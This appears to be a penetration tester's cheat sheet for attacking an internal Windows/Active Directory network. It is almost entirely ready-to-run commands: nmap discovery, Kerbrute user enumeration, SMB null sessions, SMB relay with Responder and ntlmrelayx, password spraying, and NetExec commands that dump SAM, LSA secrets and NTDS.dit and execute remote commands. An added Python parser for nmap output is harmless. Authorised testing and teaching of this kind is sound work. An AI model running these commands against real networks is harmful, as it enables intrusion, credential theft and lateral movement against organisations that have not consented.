Internal (Kali)

NMap Scans

  • Online Hosts (ICMP):

sudo nmap -sn -iL targets.txt -oG - | grep Up | cut -d' ' -f2 > up-hosts.txt
  • Full Scan:

sudo nmap -sS -Pn -sV --open -iL targets.txt -p- -vv --min-hostgroup 255 --initial-rtt-timeout 150ms --max-rtt-timeout 300ms --max-scan-delay 0 -oA FULL
  • LDAP:

sudo nmap --open -p 389 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 389.txt
  • HTTP:

sudo nmap --open -p 80 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 80.txt
  • Alt HTTP:

sudo nmap --open -p 8080 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 8080.txt
  • HTTPS:

sudo nmap --open -p 443 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 443.txt
  • Alt HTTPS:

sudo nmap --open -p 8443 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 8443.txt
  • FTP:

sudo nmap --open -p 21 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 21.txt
  • SMB:

sudo nmap --open -p 139 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 139.txt
sudo nmap --open -p 445 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 445.txt
  • Determine which hosts don't require SMB signing (script output saved to relay.txt):

sudo nmap --script=smb2-security-mode.nse -p 445 -iL up-hosts.txt -oN relay.txt
  • SSH:

sudo nmap --open -p 22 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 22.txt
  • RDP:

sudo nmap --open -p 3389 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 3389.txt
  • Scan for shares that allow anonymous login:

sudo nmap -p 445 --script smb-enum-shares.nse,smb-enum-users.nse -iL targets.txt
  • Scan online hosts for common ports (21, 22, 80, 389, 443, 3389, 8443, 8080, and UDP ports); the UDP step needs -oG output and matches "/open/" so that open|filtered ports are not counted as open:

sudo nmap --open -p 389 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 389.txt && \
sudo nmap --open -p 80 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 80.txt && \
sudo nmap --open -p 8080 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 8080.txt && \
sudo nmap --open -p 443 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 443.txt && \
sudo nmap --open -p 8443 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 8443.txt && \
sudo nmap --open -p 21 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 21.txt && \
sudo nmap --open -p 22 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 22.txt && \
sudo nmap --open -p 3389 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 3389.txt && \
sudo nmap --open -p 445 -iL up-hosts.txt -oG - | grep "/open" | awk '{ print $2 }' > 445.txt && \
sudo nmap -Pn -sU -iL up-hosts.txt -p 1-1024,5353,1900 -vvv -oG - | grep "/open/" | awk '{ print $2 }' > UDP.txt
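As an added example (not part of the original page), the per-port rescans above can be collapsed into one multi-port scan whose grepable output is then split into the same 22.txt, 445.txt and UDP.txt files; the parser also skips open|filtered entries, which a bare grep "/open" would count as open. The nmap output below is a constructed sample.

```python
from collections import defaultdict

# Constructed sample of nmap grepable (-oG) output from one multi-port run, e.g.
#   nmap --open -sS -sU -p T:21,22,80,389,443,445,U:53,161 -iL up-hosts.txt -oG -
# The third host mixes an open|filtered UDP port (not really open) with open ones.
SAMPLE_OG = """\
# Nmap scan initiated as: nmap --open -iL up-hosts.txt -oG -
Host: 10.0.0.5 (dc01.lab.local)\tStatus: Up
Host: 10.0.0.5 (dc01.lab.local)\tPorts: 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///\tIgnored State: filtered (4)
Host: 10.0.0.7 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///
Host: 10.0.0.9 ()\tPorts: 53/open|filtered/udp//domain///, 161/open/udp//snmp///, 445/open/tcp//microsoft-ds///
# Nmap done -- 3 IP addresses (3 hosts up) scanned in 5.00 seconds
"""

def parse_grepable(text):
    """Return {(proto, port): [hosts]} for entries whose state is exactly "open".
    Entries look like "port/state/proto/owner/service/rpc/version/" and are comma
    separated inside the tab-delimited "Ports:" field; splitting on "/" instead
    of grepping "/open" keeps "open|filtered" (the usual UDP answer) out."""
    hosts_by_port = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # comments and the "Nmap done" footer
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        if "Ports" not in fields:
            continue                      # "Status: Up" lines carry no ports
        host = fields["Host"].split()[0]  # IP address before "(hostname)"
        for entry in fields["Ports"].split(", "):
            port, state, proto = entry.split("/")[:3]
            if state == "open":
                hosts_by_port[(proto, int(port))].append(host)
    return dict(hosts_by_port)

def port_files(hosts_by_port):
    """Map the page's file names (22.txt, 445.txt, UDP.txt) to their contents,
    one unique host per line, so every list comes from a single scan pass."""
    files = defaultdict(list)
    for (proto, port), hosts in sorted(hosts_by_port.items()):
        name = f"{port}.txt" if proto == "tcp" else "UDP.txt"
        for host in hosts:
            if host not in files[name]:
                files[name].append(host)
    return {name: "\n".join(hosts) + "\n" for name, hosts in files.items()}

if __name__ == "__main__":
    for name, body in port_files(parse_grepable(SAMPLE_OG)).items():
        with open(name, "w") as fh:       # writes 22.txt, 445.txt, ... in cwd
            fh.write(body)
```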

User Enumeration

I like to use Kerbrute.

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
./kerbrute_linux_amd64 userenum -d DOMAIN --dc DC-IP USERLIST.txt -v -o Outfile.txt

SMB Null Sessions

git clone https://github.com/Raikia/SMBCrunch.git && cd SMBCrunch
sudo ./smbhunt.pl -i ../445.txt

View null sessions with:

sudo smbclient -L //target/share -U ""

SMB Relays

If SMB signing is not required on multiple machines, we can attempt to abuse SMB relays with Responder, NTLMRelayX (from Impacket), and Proxychains.

  1. Disable SMB and HTTP in Responder.conf (/etc/responder/Responder.conf):

sudo sed -i 's/SMB = On/SMB = Off/g' /etc/responder/Responder.conf
sudo sed -i 's/HTTP = On/HTTP = Off/g' /etc/responder/Responder.conf
  2. Change the proxychains config (/etc/proxychains4.conf):

sudo sed -i 's/9050/1080/g' /etc/proxychains4.conf
  3. Use NetExec to generate a list of hosts that do not require SMB signing (--gen-relay-list), then start Responder:

sudo netexec smb up-hosts.txt --gen-relay-list relay.txt
sudo python3 /usr/share/responder/Responder.py -I eth0 -PDv --lm
  4. Run NTLMRelayX in a new window/tab while Responder is running:

sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf relay.txt -socks -smb2support -i -of relayed-hashes.txt

Once we have captured relays, we can try to crack the captured hashes, and while they crack we can use the relayed sessions through NetExec.

  • View shares hosted on the target machine:

sudo proxychains4 netexec smb ip -u user -p '' --shares
  • Dump LSA:

sudo proxychains4 netexec smb ip -u user -p '' --lsa
  • Dump SAM hashes:

sudo proxychains4 netexec smb ip -u user -p '' --sam

Password Spraying

This method is loud but still worth using.

Find the

git clone https://github.com/absolomb/smbspray.git && cd smbspray
python3 smbspray.py -u users.txt -p passwords.txt -ip DC-IP

Further Enumeration

We can get more information by:

  • Checking if FTP is open, and if anonymous login is enabled.

  • Checking if SSH is open, and if it accepts password authentication.

  • Looking at all HTTP/HTTPS pages for login pages, information disclosure, and default login credentials.

Web Services

sudo ffuf -recursion -mc all -ac -c -u https://domain/FUZZ -w wordlist.txt
sudo ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w wordlist.txt -u https://domain/FUZZ -fc 400,401,403,404,406,500,502 > domain.txt

Post Exploitation

Once we have obtained credentials we can find even more info. I like to find more info from: LDAPDomainDump, Bloodhound (Bloodhound.py), and Manspider.

Bloodhound / Bloodhound-Python

sudo bloodhound-python -u USER -p PASSWORD -ns DNS-SERVER-IP -d DOMAIN -c All

Once we have the .json files, we can ingest them into bloodhound to look for domain admins, kerberoastable accounts, and more.

LDAPDomainDump

sudo ldapdomaindump -u DOMAIN\\USER -p PASSWORD IP

ManSpider

Crawl network shares to find any helpful info, such as files with cleartext passwords, password databases, and more.

  • Search a hostname/IP for files with "passw" in the name:

manspider TARGET -f passw -d DOMAIN -u USER -p 'PASSWORD'
  • Search for documents containing passwords:

manspider TARGET -c passw -d DOMAIN -u USER -p 'PASSWORD'

Common/Useful Netexec Commands

Find IP/hostname/SMB signing/etc.:

sudo netexec smb targets.txt
sudo netexec smb targets.txt --gen-relay-list relay.txt

Enumerate SAM hashes

sudo netexec smb ip -u user -p 'password' --sam
sudo netexec smb ip -u user -p 'password' --sam --user target-user

Enumerate LSA for potential plaintext passwords

sudo netexec smb ip -u user -p 'password' --lsa

Enumerate shares

sudo netexec smb ip -u user -p 'password' --shares

Pass cmd

sudo netexec smb ip -u user -p 'password' -x 'command'

Pass powershell

sudo netexec smb ip -u user -p 'password' -X 'command'

Look at domain admins

sudo netexec smb ip -u user -p 'password' -x 'net group "Domain Admins" /domain'

Look at logged on users

sudo netexec smb ip -u user -p 'password' --loggedon-users

Look at NTDS.dit

This is LOUD - use it with caution

sudo netexec smb dc-ip -u domain-admin-user -p 'password' --ntds

Find out what machines a user can successfully log onto

This is LOUD - use it with caution

sudo netexec smb targets.txt -u user -p 'password'
sudo netexec smb targets.txt -u user -H 'hash'
